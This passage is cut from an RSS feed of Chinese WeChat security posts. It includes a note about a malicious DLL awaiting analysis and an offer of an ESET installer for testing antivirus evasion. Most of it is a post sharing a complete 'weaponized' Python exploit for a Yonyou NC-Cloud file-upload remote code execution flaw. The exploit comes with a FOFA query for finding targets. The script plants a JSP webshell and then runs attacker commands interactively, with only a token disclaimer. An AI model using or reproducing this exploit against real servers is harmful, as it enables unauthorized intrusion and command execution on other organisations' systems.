data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=00087799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJhuxFjic8zCBYYEZWOLpx5Q2KdeljWfFnRm3fGb3raI3ocsylZdLJxbA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">唯一涉及溢出利用</span><span style="font-family:Calibri;">bin</span><span style="font-family:宋体;">文件，实际并未调用</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">恶意</span><span style="font-family:Calibri;">dll</span><span style="font-family:宋体;">明早交与大佬分析，具体结果会实时修改文章反馈。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(255,0,0);font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">自学</span><span style="font-family:Calibri;">java</span><span style="font-family:宋体;">出身，依托答辩，如有分析不对地方希望海涵，欢迎大佬指出错误。</span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483929">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6c1d5074&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247483929%26idx%3D1%26sn%3Da4248599546b0f73a2e2d3e21baee3bf%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 16 Aug 2023 02:57:00 +0800</pubDate>
    </item>
    <item>
      <title>领哨兵安装包！！转发朋友圈，群聊凭截图来拿</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247483887&amp;idx=1&amp;sn=dfc5c825239540b89d99463dacce272f</link>
      <description>刚刚嫖到新鲜哨兵eset安装包，现在分享给大家，想测免杀朋友可以踊跃来拿。转发朋友圈或群聊，凭截图来取！！！</description>
      <content:encoded><![CDATA[<p>
<span>41group</span> <span>2023-08-15 16:05</span> <span style="display: inline-block;">安徽</span>
</p>

<p>刚刚嫖到新鲜哨兵eset安装包，现在分享给大家，想测免杀朋友可以踊跃来拿。转发朋友圈或群聊，凭截图来取！！！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=22bcf694&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJ8t87jiaLHNE2F2tYJEWAQPv4qAcyWn1bad42uKtPSnpdumDoQRgBIRw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="color: rgb(255, 0, 0);">刚刚嫖到新鲜哨兵eset安装包，现在分享给大家，想测免杀朋友可以踊跃来拿。</span></p><p><span style="color: rgb(255, 0, 0);">转发朋友圈或群聊，凭截图来取！！！！！</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4646017699115044" data-s="300,640" style="" data-type="png" data-w="678" src="https://wechat2rss.xlab.app/img-proxy/?k=e87fb397&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJIynlhib0KCznC1wY1UbhkeB04XiaGB3ibROpRfD42O8icWOiavTwyM80EJA%2F640%3Fwx_fmt%3Dpng"/></p><p>哨兵是啥？？看度娘</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4540412044374009" data-s="300,640" style="" data-type="png" data-w="2524" src="https://wechat2rss.xlab.app/img-proxy/?k=41e9ec65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJgHGoBI2s1F8CJ0c4osds88RwT1DoODA5ZcOHqDqlicbfNOExyGG7NAQ%2F640%3Fwx_fmt%3Dpng"/></p><p>安装效果</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4787037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4da04002&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJqmiaYpysRt7Knh0zSZDh8r4rmHHxOA6icPeCicKJmTjJ72BxVDUtKTL9A%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6609257265877287" data-s="300,640" style="" data-type="png" data-w="929" src="https://wechat2rss.xlab.app/img-proxy/?k=8f26ea77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJKvMQCYALkicvbXM3Oia77xErh5MlyTzQ4KTPh2KqGxB8ESbz5v3Q9FwQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6203703703703703" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8fc5c676&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fHKuEzmDvHFgTDCCu63LEJEhWZxC9F1fSosaEUU6VkKG4YLeVnCGTOOhxmGY5yWEgs2Lf26l5Giaw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(255, 0, 0);">另：安装需要token，转发后私聊领取</span></p><p style="text-align: center;visibility: visible;">欢迎各位大佬入群交流，需要各种资料也可入群领取。</p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">二维码失效加好友进群！！！！！！！！！！！<br/></span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">群满请加wx入群！！！！！！！</span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">wx：Mathearsion</span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;visibility: visible;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.5548387096774194" data-s="300,640" style="visibility: visible !important;width: 677px !important;height: auto !important;" data-type="png" data-w="930" src="https://wechat2rss.xlab.app/img-proxy/?k=967c79c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9ecOuibKHibgnUCJyIJ2kkicmY16tvZJa1QIOctq9eia9S3rAS31SFSsXJYsH2iaOOnjDQf7cnon1IPXrw%2F640%3Fwx_fmt%3Dpng%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483887">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=50c73927&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247483887%26idx%3D1%26sn%3Ddfc5c825239540b89d99463dacce272f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 15 Aug 2023 16:05:00 +0800</pubDate>
    </item>
    <item>
      <title>用友0day武器化脚本自取</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247483875&amp;idx=1&amp;sn=652f0ee576f934b53b3e4fcd2bebfbf7</link>
      <description>gh开始到一个小高潮了，每天0day爆出无数，既然发现这个也被爆了那就直接把武器化脚本丢给大家，祝各位打出自</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2023-08-12 18:36</span> <span style="display: inline-block;">安徽</span>
</p>

<p>gh开始到一个小高潮了，每天0day爆出无数，既然发现这个也被爆了那就直接把武器化脚本丢给大家，祝各位打出自</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=0c6cfae1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dAtx70icZlg0sRBCCLueHXRAvicGLkcObyib3ds99uyCe64mBKQ5fEanMWB6StsfBMk7WTLgMhVz0Pw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p>gh开始到一个小高潮了，每天0day爆出无数，既然发现这个也被爆了那就直接把武器化脚本丢给大家，祝各位打出自己满意的成绩！！<span style="color: rgb(255, 0, 0);">为国家网络安全提升做出贡献</span>！！！</p><p><span style="color: rgb(255, 0, 0);">免责声明：本工具只为学习使用，切勿用户非法途径。一切因本工具或此漏洞产生的后果，利用者自己承担，与本公众号任何人无关！！！！</span><br/></p><p>用友nc-Cloud upload rce</p><p>fofa=app=&#34;用友-NC-Cloud&#34;</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="python"><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> requests</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">import</span> re</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">def</span> <span class="code-snippet__title">cmd</span><span class="code-snippet__params">(url, command)</span>:</span></span></code><code><span class="code-snippet_outer">    url = url + <span class="code-snippet__string">&#34;/404.jsp?error=bsh.Interpreter&#34;</span></span></code><code><span class="code-snippet_outer">    headers = {<span class="code-snippet__string">&#34;Content-Type&#34;</span>: <span class="code-snippet__string">&#34;application/x-www-form-urlencoded&#34;</span>, <span class="code-snippet__string">&#34;User-Agent&#34;</span>: <span class="code-snippet__string">&#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36&#34;</span>}</span></code><code><span class="code-snippet_outer">    data = {<span class="code-snippet__string">&#34;cmd&#34;</span>: <span class="code-snippet__string">&#34;org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(\&#34;&#34;</span> + command + <span class="code-snippet__string">&#34;\&#34;).getInputStream())&#34;</span>}</span></code><code><span class="code-snippet_outer">    r = requests.post(url, headers=headers, data=data)</span></code><code><span class="code-snippet_outer">    print(re.findall(<span class="code-snippet__string">r&#39;&lt;string&gt;(.*?)&lt;/string&gt;&#39;</span>, r.text, re.S)[<span class="code-snippet__number">0</span>])</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">def</span> <span class="code-snippet__title">upload</span><span class="code-snippet__params">(url)</span>:</span></span></code><code><span class="code-snippet_outer">    url = url + <span class="code-snippet__string">&#34;/uapjs/jsinvoke/?action=invoke&#34;</span></span></code><code><span class="code-snippet_outer">    headers = {<span class="code-snippet__string">&#34;User-Agent&#34;</span>: <span class="code-snippet__string">&#34;Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0&#34;</span>, <span class="code-snippet__string">&#34;Accept&#34;</span>: <span class="code-snippet__string">&#34;*/*&#34;</span>, <span class="code-snippet__string">&#34;Content-Type&#34;</span>: <span class="code-snippet__string">&#34;application/x-www-form-urlencoded&#34;</span>, <span class="code-snippet__string">&#34;Accept-Encoding&#34;</span>: <span class="code-snippet__string">&#34;gzip&#34;</span>}</span></code><code><span class="code-snippet_outer">    json={<span class="code-snippet__string">&#34;methodName&#34;</span>: <span class="code-snippet__string">&#34;saveXStreamConfig&#34;</span>, <span class="code-snippet__string">&#34;parameters&#34;</span>: [<span class="code-snippet__string">&#34;${param.getClass().forName(param.error).newInstance().eval(param.cmd)}&#34;</span>, <span class="code-snippet__string">&#34;webapps/nc_web/404.jsp&#34;</span>], <span class="code-snippet__string">&#34;parameterTypes&#34;</span>: [<span class="code-snippet__string">&#34;java.lang.Object&#34;</span>, <span class="code-snippet__string">&#34;java.lang.String&#34;</span>], <span class="code-snippet__string">&#34;serviceName&#34;</span>: <span class="code-snippet__string">&#34;nc.itf.iufo.IBaseSPService&#34;</span>}</span></code><code><span class="code-snippet_outer">    r = requests.post(url, headers=headers, json=json)</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> r.status_code == <span class="code-snippet__number">200</span>:</span></code><code><span class="code-snippet_outer">        print(<span class="code-snippet__string">&#34;上传成功&#34;</span>)</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">else</span>:</span></code><code><span class="code-snippet_outer">        print(<span class="code-snippet__string">&#34;上传失败&#34;</span>)</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">def</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">()</span>:</span></span></code><code><span class="code-snippet_outer">    url = input(<span class="code-snippet__string">&#34;请输入url：&#34;</span>)</span></code><code><span class="code-snippet_outer">    upload(url)</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">while</span> <span class="code-snippet__keyword">True</span>:</span></code><code><span class="code-snippet_outer">        command = input(<span class="code-snippet__string">&#34;请输入命令(quit退出) &gt; &#34;</span>)</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> command == <span class="code-snippet__string">&#34;quit&#34;</span>:</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">break</span></span></code><code><span class="code-snippet_outer">        cmd(url, command)</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> __name__ == <span class="code-snippet__string">&#39;__main__&#39;</span>:</span></code><code><span class="code-snippet_outer">    main()</span></code></pre></section><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6866125760649088" data-s="300,640" style="" data-type="png" data-w="986" src="https://wechat2rss.xlab.app/img-proxy/?k=25d9a978&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dAtx70icZlg0sRBCCLueHXRnYG5PHXJNvbFBcYia8KOsaKosZTUeCedP2QZpNlSicO11bnOIztpdVGw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(255, 0, 0);">请勿用于非法用途！！！！后果自负<br/></span></p><p><span style="color: rgb(0, 0, 0);">41全体祝大家工作顺利！！！！！</span></p><p style="text-align: center;visibility: visible;">欢迎各位大佬入群交流，需要各种资料也可入群领取。</p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">二维码失效加好友进群！！！！！！！！！！！<br/></span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">群满请加wx入群！！！！！！！</span></p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">wx：Mathearsion</span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;visibility: visible;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.5548387096774194" data-s="300,640" style="visibility: visible !important;width: 677px !important;height: auto !important;" data-type="png" data-w="930" src="https://wechat2rss.xlab.app/img-proxy/?k=967c79c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9ecOuibKHibgnUCJyIJ2kkicmY16tvZJa1QIOctq9eia9S3rAS31SFSsXJYsH2iaOOnjDQf7cnon1IPXrw%2F640%3Fwx_fmt%3Dpng%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></p><p><span style="color: rgb(255, 0, 0);"><br/><mpchecktext><br/></mpchecktext></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483875">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a9c6067d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247483875%26idx%3D1%26sn%3D652f0ee576f934b53b3e4fcd2bebfbf7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 12 Aug 2023 18:36:00 +0800</pubDate>
    </item>
  </channel>
</rss>